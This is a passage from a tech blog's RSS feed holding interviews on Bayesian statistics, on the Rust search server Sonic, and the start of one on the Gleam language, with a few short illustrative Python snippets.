&lt;p&gt;Frequentists interpret probability as a statement about how frequently an event should occur in repeated trials. So if we toss a coin twice we should expect to get 1 head because the frequency of heads is 1&#x2F;2. Bayesians interpret probability as a statement of our knowledge, basically as a continuous version of logic. The probability of getting heads in a coin toss is 0.5 because I don’t believe getting heads is any more likely than getting tails. For coin tosses both schools of thought work pretty well. But when you talk about things like the probability that your favorite football team will win the world cup, talking about degrees of belief makes a lot more sense. This additionally means that Bayesian statistics does not make statements about the world but about our understanding of the world. And since we each understand the world a bit differently, Bayesian statistics allows us to incorporate that difference into our analysis. Bayesian analysis is, in many ways, the science of changing your mind.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;5. Why did you choose to focus on the bayesian approach?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;There are plenty of really great philosophical reasons to focus on Bayesian statistics but for me there is a very practical reason: everything makes sense. From a small set of relatively intuitive rules you can build out the solutions to any problem you encounter. This gives Bayesian statistics a lot of power and flexibility, and also makes it much easier to learn. I think this is something programmers will really like about Bayesian reasoning. You aren’t applying ad hoc tests to a problem, but reasoning about your problem and coming up with a solution that makes sense. Bayesian statistics is really reasoning. You agree to the statistical analysis only when it genuinely makes sense and convinces you, not because some seemingly arbitrary test result achieves some equally arbitrary value. Bayesian statistics also allows us to disagree quantitatively. It’s quite common in everyday life that two people will see the same evidence and come to different conclusions. Bayesian statistics allows us to model this disagreement in a formal way so that we can see what evidence it would take to change our beliefs. You shouldn’t believe the results of a paper because of a p-value; you should believe them because they truly convince you.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;6. How is Bayesian statistics related to machine learning?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;One way I’ve been thinking about the relationship between Bayesian Statistics and Machine Learning (especially neural networks) is the way that each deals with the fact that calculus can get really, really hard. Machine Learning is essentially understanding and solving really tricky derivatives. You come up with a function and a loss for it, then compute (automatically) the derivative and try to follow it until you get optimal parameters. People often snarkily remark that backpropagation is “just the chain rule”, but nearly all the really hard work in deep learning is applying that successfully.&lt;&#x2F;p&gt;
&lt;p&gt;Bayesian statistics is the other part of calculus, solving really tricky integrals. The Stan developer Michael Betancourt made a great comment that basically all Bayesian analysis is really computing expectations, which means solving integrals. Bayesian analysis leaves you with a posterior distribution, but you can’t use a distribution for anything unless you integrate over it to get a concrete answer. Thankfully no one makes snarky comments about integrals, because everyone knows that they can be really tricky even in the simplest cases. This xkcd makes that point nicely:&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-vska22BJzFePmtcrzokZ0A.png&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;So in this strange way, Machine Learning and Bayesian Statistics, in their current states, are what happens when you push basic calculus ideas to the limits of what we can compute.&lt;&#x2F;p&gt;
&lt;p&gt;This relationship also outlines the key differences. When you think about derivatives you’re looking for a specific point related to a function. If you know location and time, the derivative is speed and can tell you when you went the fastest. Moving the needle in ML is getting a single metric better than anyone else. Integration is about summarizing an entire process. Again if you know location and time, the integral is distance and tells you how far you’ve traveled. Bayesian statistics is about summarizing all of your knowledge about a problem, but this allows us to not just give single predictions but also say how confident we are in a wide range of predictions. Advancement in Bayesian statistics is about understanding more complex systems of information.&lt;&#x2F;p&gt;
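&lt;p&gt;(A small numerical illustration of the point that Bayesian answers are expectations, i.e. integrals over the posterior; the Beta(7, 5) posterior here is invented for the sketch, not taken from the book.)&lt;&#x2F;p&gt;

```python
# Hypothetical example: a posterior expectation as a numerical integral.
import math

def beta_pdf(x, a, b):
    # Beta density written with the gamma function, so no SciPy is needed.
    coef = math.gamma(a + b) / (math.gamma(a) * math.gamma(b))
    return coef * x ** (a - 1) * (1 - x) ** (b - 1)

# Midpoint rule for E[theta] = integral of theta * p(theta) over [0, 1].
n = 100_000
mean = sum(
    ((i + 0.5) / n) * beta_pdf((i + 0.5) / n, 7, 5) for i in range(n)
) / n
print(mean)  # roughly 7 / 12, the closed-form mean of Beta(7, 5)
```

&lt;p&gt;Here the integral happens to have a closed form; the point is that in general, getting any concrete number out of a posterior means evaluating an integral like this one, by hand or by machine.&lt;&#x2F;p&gt;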
&lt;p&gt;&lt;strong&gt;7. If your readers wanted to dig deeper into the subject of the book, where would you point them to (books, courses, blog posts, etc)?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;The biggest inspiration for this book was E.T. Jaynes’ “Probability Theory: the Logic of Science”. My secret hope is that “Bayesian Statistics the Fun Way” can be a version of that book accessible to everyone. Jaynes’ book is really quite challenging to work through and presents a pretty radical version of Bayesian statistics. Aubrey Clayton has done an amazing service by putting together a &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.youtube.com&#x2F;watch?v=rfKS69cIwHc&quot;&gt;series of lectures&lt;&#x2F;a&gt; on the key chapters of this book.&lt;&#x2F;p&gt;
&lt;p&gt;And of course if you liked reading the book you’d probably enjoy my &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.countbayesie.com&#x2F;&quot;&gt;blog&lt;&#x2F;a&gt;. I haven’t been posting much recently since I’ve been writing “Bayesian Statistics the Fun Way” and, before that, “Get Programming with Haskell”, but I’ve got a ton of posts in my head that I really want to get down on paper soon. Generally the blog, despite the name, is not strictly Bayesian. Typically if I have some statistics&#x2F;probability topic that I’m thinking about, it will get fleshed out into a blog post.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;8. In your experience, what is a concept from probability&#x2F;statistics that non experts find difficult to understand?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Honestly, the hardest part is interpreting probabilities. People really lost faith in a lot of Bayesian analysts like Nate Silver (and many others) when they were predicting 80% or so chance that Clinton would win the 2016 election and she didn’t. People felt like they had been tricked and everyone was wrong, but 80% chance really isn’t that high. If my doctor tells me I have an 80% chance to live I’m going to be really nervous.&lt;&#x2F;p&gt;
&lt;p&gt;A common approach to this problem is to point to probabilities themselves and say that they are a poor way to express uncertainty. The fix then is that you should be using odds or likelihood ratios or some decibel-like system similar to Jaynes’s idea of evidence. But after really thinking about probability for a long time, I haven’t found a universally good way to express uncertainty.&lt;&#x2F;p&gt;
&lt;p&gt;The heart of the problem is that, deep down, we really want to believe that the world is certain. Even among experienced probabilists there’s this persistent nagging feeling that maybe if you do the right analysis, learn the right prior, add another layer into your hierarchical model, you can get it right and remove or at least dramatically reduce uncertainty. Part of what draws me to probability is the weird mixture of trying to make sense of the world and the meditation on the fact that even when trying your hardest, the world will surprise you.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;9. What are your thoughts on p-values as a measure of statistical significance? Could you give us a brief description of p-hacking?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;There are two things wrong with p-values. First of all, p-values are not the way sane people answer questions. Imagine how this conversation would sound at work:&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;Manager: “Did you fix that bug assigned to you?”&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;You: “Well I’m pretty sure I didn’t not fix it…”&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;Manager: “If you fixed it, just mark it fixed.”&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;You: “Oh no, I really can’t say that I fixed it…”&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;Manager: “So you want to mark it ‘will not fix’?”&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;You: “No, no, I’m pretty sure that’s not the case”&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;p&gt;p-values confuse people because they are, quite literally, confusing. Bayesian statistics gives you a posterior probability, which is exactly the positive answer to the question being posed that you want. In the previous dialog the Bayesian says “I’m pretty sure it’s fixed”. If the manager wants you to be more sure, you collect more data, and then you can say “I’m basically certain it’s fixed”.&lt;&#x2F;p&gt;
&lt;p&gt;The second problem is the culture of arbitrarily picking 0.05 as some magic value that has meaning. Related to the previous question about understanding probabilities, a 5% chance of something occurring does not make it very rare. Rolling a 20-sided die and getting a 20 has a 5% chance, and anyone who knows of Dungeons and Dragons (D&amp;amp;D) knows that this is far from impossible. Outside of role-playing games, focusing on a die roll is not a great system for telling true from false.&lt;&#x2F;p&gt;
&lt;p&gt;And that brings us to p-hacking. Imagine you’re playing D&amp;amp;D with some friends and you roll twenty 20-sided dice all at once. You then point to one that landed on 20 and proclaim “that was the die I meant to roll, the rest are all just test dice.” It’s still cheating even if you technically did roll a 20. That’s what p-hacking essentially is. You keep doing analysis until you find something that is ‘significant’, and then claim that’s what you were looking for the entire time.&lt;&#x2F;p&gt;
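&lt;p&gt;The twenty-dice analogy above can be checked numerically. The following sketch (a hypothetical Python illustration, not part of the interview) computes the chance that at least one of twenty d20s lands on 20, and confirms it by simulation — which is exactly why cherry-picking one “significant” result out of many tests is misleading:&lt;&#x2F;p&gt;

```python
import random

random.seed(0)

# Analytic probability that at least one of twenty d20s shows a 20:
# the complement of all twenty dice missing.
p_at_least_one = 1 - (19 / 20) ** 20  # roughly 0.64

# Monte Carlo check: roll twenty dice many times and count trials
# where at least one die "reaches significance".
trials = 100_000
hits = sum(
    any(random.randint(1, 20) == 20 for _ in range(20))
    for _ in range(trials)
)
print(p_at_least_one, hits / trials)
```

&lt;p&gt;So running twenty independent tests at the 5% level gives you roughly a two-in-three chance of at least one spurious “discovery”.&lt;&#x2F;p&gt;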
&lt;p&gt;&lt;strong&gt;10. Any closing recommendations on what book to read next after reading your book?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Now that I’ve finished writing this book I finally have time to start catching up on other books that I didn’t have time to read while writing it! I’m really enjoying Osvaldo Martin’s “Bayesian Analysis with Python” (I know Not a Monad Tutorial interviewed him not long ago). It’s a great book that approaches Bayesian analysis through PyMC3. I really think the world of probabilistic programming is very exciting and will be more and more an essential part of practical Bayesian statistics. Another book I really want to read is Richard McElreath’s “Statistical Rethinking”. It has a second edition coming out soon so I’m slightly hesitant to get a copy before that. McElreath has put up a bunch of great supporting material on his &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;xcelab.net&#x2F;rm&#x2F;statistical-rethinking&#x2F;&quot;&gt;website&lt;&#x2F;a&gt;, so I might not be able to wait until the 2nd edition to get a copy. Both of these sources would be great next steps following “Bayesian Statistics the Fun Way”. Another good recommendation is Kruschke’s “Doing Bayesian Data Analysis”.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>Sonic: a minimalist alternative to Elasticsearch written in Rust</title>
          <pubDate>Tue, 02 Apr 2019 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/sonic-a-minimalist-alternative-to-elasticsearch-written-in-rust/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/sonic-a-minimalist-alternative-to-elasticsearch-written-in-rust/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/sonic-a-minimalist-alternative-to-elasticsearch-written-in-rust/">&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-ur9rT3EUiunAzys52MePnQ.jpeg&quot; alt=&quot;&quot; &#x2F;&gt;« Sonic » is the mascot of the Sonic project. Valerian drew it to look like a psychedelic hipster hedgehog.&lt;&#x2F;p&gt;
&lt;p&gt;Database implementation sits in a nice spot between computer science and software engineering. There are a lot of tradeoffs to consider. That is why nowadays we have a plethora of databases, each of them useful in a particular scenario. In the projects we work on at &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;lambdaclass.com&#x2F;&quot;&gt;LambdaClass&lt;&#x2F;a&gt; we always end up using the following: Redis, Elasticsearch, PostgreSQL, Kafka and Riak or Cassandra. It is difficult to keep up with the number of databases that are needed and it is even more difficult to learn about their internals.&lt;&#x2F;p&gt;
&lt;p&gt;I always end up using Elasticsearch to index documents, to generate autocompletes and for geolocation. &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;valeriansaliou&#x2F;sonic&quot;&gt;Sonic&lt;&#x2F;a&gt; doesn’t solve all three problems but it is a good tool to solve the first two. I have not yet used it in production, but it seems like a good lightweight alternative to Elasticsearch.&lt;&#x2F;p&gt;
&lt;p&gt;Since we love databases and we are trying to focus on Rust projects, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;twitter.com&#x2F;nenearria&quot;&gt;Amin Arria&lt;&#x2F;a&gt; and I decided to interview Sonic’s creator, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;valeriansaliou&quot;&gt;Valerian Saliou,&lt;&#x2F;a&gt; who generously agreed. Also remember to check Sonic’s &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;valeriansaliou&#x2F;sonic&quot;&gt;repository&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;hr &#x2F;&gt;
&lt;p&gt;&lt;strong&gt;What is Sonic?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Sonic is an open-source search index server, written in Rust. It was built with simplicity, performance and lightweight-ness in mind. Sonic takes user queries in, and returns identifiers. Those identifiers refer to actual documents in a relational database (eg. in our case: messages, helpdesk articles, CRM contacts, etc). Sonic does not store documents, which makes the whole system simple and efficient regarding storage, as an application getting search results from Sonic has to pull actual result data from another database (eg. MongoDB, MySQL, etc. given the search result IDs that are returned).&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Don’t Solr, ElasticSearch, Tantivy and Toshi solve similar issues to Sonic? Why did you create a new alternative?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;I run a business called Crisp, which provides 100,000 users with customer support software. Users want to search in their messages, and some of our users have A LOT of messages. Using traditional open-source search index software (eg. Elasticsearch amongst others) proved to be too expensive for our freemium model, as those systems are heavy and thus require huge amounts of server CPU and RAM.&lt;&#x2F;p&gt;
&lt;p&gt;As a developer and sysadmin, I really love Redis for its simplicity and speed. In computer software, simplicity often provides speed, which is a good thing at scale. I built Sonic to be “the Redis of search”: simple features, simple network protocol.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Why did you decide to use Rust? How was the experience of creating Sonic in Rust?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Rust makes the whole development experience smoother. The constraints of the language (eg. the borrow checker, the fact that there are no NULL values) guarantee that you won’t experience certain kinds of bugs while running your project in production (eg. NULL pointer exceptions and segmentation faults, which are unavoidable in programming languages such as C, C++ or Go; humans make mistakes).&lt;&#x2F;p&gt;
&lt;p&gt;I’ve already built other Rust projects in the past to support the Crisp infrastructure at scale, such as Bloom, Vigil and Constellation (which are also available as open-source software on my GitHub). Rust was no new thing to me; overall I love working with the language. My first Rust projects 2 years ago were a bit rough, as you have to spend a lot of time with the borrow checker getting in your way for “no reason”. Once you understand how it works, you become much more productive and Rust borrow checker errors become rare.&lt;&#x2F;p&gt;
&lt;p&gt;So overall, I can say that the experience of writing Sonic in Rust has been great. I love Rust. As a plus, it makes me become a better programmer.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;What is Sonic Channel? Is this feature inspired by Redis?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Sonic Channel is the name of the protocol used to communicate with Sonic over the network. As most application infrastructures today are distributed over multiple machines via the network, a TCP-based protocol to push new text data to the index and query the index was required. For performance reasons, I did not want to write an HTTP-based protocol, as Elasticsearch has.&lt;&#x2F;p&gt;
&lt;p&gt;After releasing Sonic, I got a lot of contributions from the community to build Sonic Channel libraries (integrations) for the most popular programming languages: Go, Python, Ruby, Java, PHP and JavaScript (runs on NodeJS only). This lets developers push data and search for items in Sonic right from their application, in their preferred programming language. It makes the whole process of integrating Sonic easier than calling a REST API, and cleaner.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;What data structures do you use to create the index and to autocomplete words?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;The index is stored in a LSM (Log-Structured Merge-tree), which is used by RocksDB under the hood. To auto-complete words, Sonic uses an FST (Finite-State Transducer), which is explained in great detail in an article by &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;BurntSushi&quot;&gt;BurntSushi&lt;&#x2F;a&gt; on &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;blog.burntsushi.net&#x2F;transducers&#x2F;a&quot;&gt;his blog&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;An FST is stored on-disk for each Sonic (collection, bucket) pair, and is memory-mapped, which means that actual FST data is not loaded in RAM, but access is still fast. The downside of the Rust FST implementation that I’m using is that any built FST is immutable. If a new word appears in a Sonic bucket, it needs to be pushed to the FST and thus a new FST needs to be re-built. Sonic runs a consolidation task periodically for mutated FSTs, and adds or removes words from them on-disk.&lt;&#x2F;p&gt;
&lt;p&gt;The FST structure is not only used for word auto-completion, but also for typo corrections (eg. it is capable of correcting “Englich” to “English”). It uses a Levenshtein automaton to achieve that (given a maximum Levenshtein distance that’s relative to the length of the word; ie. the longer a word is, the more typos you allow).&lt;&#x2F;p&gt;
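&lt;p&gt;As a rough illustration of the length-relative distance idea described above (a simplified Python sketch, not Sonic’s actual Rust implementation, with a hypothetical typo-budget policy), one can combine a classic dynamic-programming edit distance with a word-length-based threshold:&lt;&#x2F;p&gt;

```python
def levenshtein(a: str, b: str) -> int:
    # Classic dynamic-programming edit distance, row by row.
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,           # deletion
                           cur[j - 1] + 1,        # insertion
                           prev[j - 1] + (ca != cb)))  # substitution
        prev = cur
    return prev[-1]

def max_typos(word: str) -> int:
    # Hypothetical policy: longer words are allowed more typos,
    # mirroring the length-relative distance described above.
    return 0 if len(word) < 4 else 1 if len(word) < 8 else 2

def correct(query: str, vocabulary: list[str]) -> list[str]:
    # Keep vocabulary words within the query's typo budget.
    limit = max_typos(query)
    return [w for w in vocabulary if levenshtein(query, w) <= limit]

print(correct("englich", ["english", "spanish", "polish"]))
```

&lt;p&gt;A real Levenshtein automaton avoids computing the distance to every word: it compiles the query and budget into an automaton that is intersected with the FST, so only matching paths are ever explored.&lt;&#x2F;p&gt;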
&lt;p&gt;&lt;strong&gt;Why did you choose RocksDB as the storage?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;facebook&#x2F;rocksdb&quot;&gt;RocksDB&lt;&#x2F;a&gt; (from Facebook) is built on LevelDB (from Google), which I had good experience using through the SSDB open-source software.&lt;&#x2F;p&gt;
&lt;p&gt;It is very good at keeping performance stable on huge key-spaces and minimizes disk usage by compressing old data (it has a leveled data storage architecture, where old data moves down to lower levels that can be compressed with a higher but slower compression ratio).&lt;&#x2F;p&gt;
&lt;p&gt;RocksDB improves on LevelDB, and is very configurable. This means Sonic users can tune the internals of RocksDB through Sonic configuration to get the best out of their setups given their server hardware (spinning disks or SSDs, how many CPU cores they have, etc.).&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Any material you can offer for anyone wanting to learn how a search engine like Sonic works, and how to build it?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;I’ve written a blog post summing up quickly &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;journal.valeriansaliou.name&#x2F;announcing-sonic-a-super-light-alternative-to-elasticsearch&#x2F;&quot;&gt;how Sonic works&lt;&#x2F;a&gt;. I plan to write an extensive documentation to explain the inner workings on Sonic, which is tracked on &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;valeriansaliou&#x2F;sonic&#x2F;issues&#x2F;103&quot;&gt;this GitHub issue&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;Overall, reading Sonic code should help understand how things work. I spent a lot of time commenting my code and making it as clear as possible.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;What is jemalloc and why do you use it?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;jemalloc is a memory allocator that was originally written for FreeBSD. It was designed for modern CPU architectures, and is much better at managing memory on multi-core machines. It has no particular benefit on single-core machines, but it has proved to be as good as older allocators in that case. So at worst it’s as good as traditional allocators; at best it provides better performance on multi-core CPUs and reduced memory fragmentation.&lt;&#x2F;p&gt;
&lt;p&gt;Rust previously used jemalloc as its default allocator, and has recently moved to the system allocator for reasons other than performance. People can &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.bsdcan.org&#x2F;2006&#x2F;papers&#x2F;jemalloc.pdf&quot;&gt;read more on jemalloc&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Did you have any experience building something like this before? What do you recommend reading to other people to learn how to build a tool like Sonic?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;I’ve built a great deal of server software, but I’ve never written databases. Databases can be hard, as they involve a great deal of lock strategies to prevent race conditions, so database developers have to be meticulous. Locks are hard to get right; locks in production are even harder: it’s easy to write code that dead-locks, while finding why a dead-lock occurs is painful.&lt;&#x2F;p&gt;
&lt;p&gt;I’d recommend people willing to build a Sonic-like project to read existing source code. The best way to build things yourself is to understand how others did it in the past.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Do you think they are fine? Do you want to change anything?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Yes, it looks like Sonic has worked great so far. Crisp search is now snappy and our results are relevant. Our users are happy.&lt;&#x2F;p&gt;
&lt;p&gt;Our Sonic instance indexes half a billion objects (messages, articles, contacts). The compressed index is 20GB, and CPU usage under load is 10% of 1 Intel Xeon core. Sonic uses ~200MB of RAM for such a large index at worst, and 20MB when it’s cold-started. Search latency is under 1ms.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>An interview with the creator of Gleam: an ML like language for the Erlang VM with a compiler…</title>
          <pubDate>Mon, 01 Apr 2019 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/an-interview-with-the-creator-of-gleam-an-ml-like-language-for-the-erlang-vm-with-a-compiler/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/an-interview-with-the-creator-of-gleam-an-ml-like-language-for-the-erlang-vm-with-a-compiler/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/an-interview-with-the-creator-of-gleam-an-ml-like-language-for-the-erlang-vm-with-a-compiler/">&lt;h3 id=&quot;an-interview-with-the-creator-of-gleam-an-ml-like-language-for-the-erlang-vm-with-a-compiler-written-in-rust&quot;&gt;An interview with the creator of Gleam: an ML like language for the Erlang VM with a compiler written in Rust&lt;&#x2F;h3&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-ivv-xih7D4rulPdRNmSYkg.png&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;I have been writing soft real time systems with Erlang for almost a decade and for that task I think it is the best tool we have around. The concurrency model, the preemptive scheduler, the GC, the profiling tools, the libraries and the community are excellent for the task. Distribution libraries like &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;lasp-lang.readme.io&#x2F;docs&quot;&gt;Lasp&lt;&#x2F;a&gt; or distributed systems frameworks like &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;riak_core_tutorial&quot;&gt;Riak Core&lt;&#x2F;a&gt; are not easily available in other languages. Lastly, cheap processes, non-shared state, supervisors and the let-it-crash philosophy are great tools when you are writing backends. Instead of trying to catch all the errors at compile time, you accept that it is impossible to catch all the possible problems and you deal with that reality. It is a very different error handling model from what you can find in Haskell or OCaml.&lt;&#x2F;p&gt;
&lt;p&gt;However Erlang language is pretty simple. I always miss sum types when I am coding in Erlang. I miss ML’s type system expressiveness, safety and practicality. That is why I am interested in the development of Gleam, a statically typed functional programming language for the BEAM.&lt;&#x2F;p&gt;
&lt;p&gt;Another interesting thing about Gleam is that its compiler is written in Rust. I think of Rust as a sort of ML + C language. I like C since the developer is in the driver’s seat, driving with manual transmission. I can’t explain it very well, but I have always seen C as a simple and powerful language, while I have always disliked C++. Knowing that I like ML and C, you might understand why I find Rust an interesting language.&lt;&#x2F;p&gt;
&lt;p&gt;To sum up, we (&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;twitter.com&#x2F;JuanBono&quot;&gt;Juan Bono&lt;&#x2F;a&gt; and I) decided to do this interview with &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;twitter.com&#x2F;louispilfold&quot;&gt;Louis Pilfold&lt;&#x2F;a&gt; not only because of what Gleam is, but also because it is implemented in Rust. Go ahead and check &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lpil&#x2F;gleam&quot;&gt;Gleam’s repo&lt;&#x2F;a&gt;!&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-x_OU1YRmBR8037eqsSAfYA.png&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;hr &#x2F;&gt;
&lt;p&gt;&lt;strong&gt;Tell us a little about yourself. Have you been working on programming languages for long?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Professionally I’m a web programmer, but over the last 4 years my hobby projects have largely been compilers in one form or another. Two of the most popular ones have been Dogma (an Elixir to angry error message compiler) and exfmt (an Elixir to slightly prettier Elixir formatter). For the last year I’ve been focusing on Gleam, which is an ML inspired statically typed language for the Erlang ecosystem.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;What was the first programming language you learned?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;The first language I attempted to learn was C, though with no experience and nothing but a few youtube videos I didn’t make much progress. After that I discovered an online version of MIT’s introduction to computer science and worked my way through that, so Python was the first language I successfully learnt. After finishing the course I discovered Ruby, which became my day-to-day language and my introduction to the world of web dev and professional programming, and then Haskell, which really shaped how I think about solving problems with code.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Why do you think that the ML languages are a good fit for the BEAM VM?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Both families share the same lambda calculus core, and once you’ve discarded the various bells and whistles of the individual languages (such as processes, type classes, module functors, etc) they all have strikingly similar semantics. Given these shared semantics I think we can take the much loved type systems of ML languages and the proven value of the BEAM VM to create a language that has the best of both, or at least lots of fun :)&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;How does Gleam compare to the other ML-like initiatives targeting the Erlang VM? (Alpaca, Elchemy, etc). What are the main differences and what motivated you to create Gleam?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;I think Gleam has a subtly different outlook to the other projects, it is more focused on using the learnings of ML to enhance the BEAM rather than creating an actual ML language. This thinking has resulted in some design differences such as simple interop in both directions, no auto-currying, no effects system, curly brace based syntax, and an Erlang style module system.&lt;&#x2F;p&gt;
&lt;p&gt;I’m very glad that there are multiple projects working in this area. If Gleam fails and one of the other projects manages to build a healthy community then I’ll still be happy, I just want at least one to succeed so I can use it in the real world.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Do you compile Gleam directly to BEAM bytecode?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;The Gleam compiler has had a few full rewrites. The previous version compiled to BEAM bytecode via Core Erlang, an intermediate representation used by the Erlang compiler, but the current version compiles to regular Erlang source code that has been pretty-printed. This has a few nice advantages such as providing an escape hatch for people who no longer wish to use Gleam, and enabling Erlang&#x2F;Elixir&#x2F;etc projects to use libraries written in Gleam without having to install the Gleam compiler.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;What kind of type system Gleam uses? (Hindley-Milner?)&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Gleam uses a Hindley-Milner type system with a fairly standard implementation of Algorithm W. One slightly unusual addition is that row types are used to represent both records (which are Erlang maps) and modules, making them polymorphic in a way that I believe fits the way we use maps and modules in Erlang&#x2F;Elixir.&lt;&#x2F;p&gt;
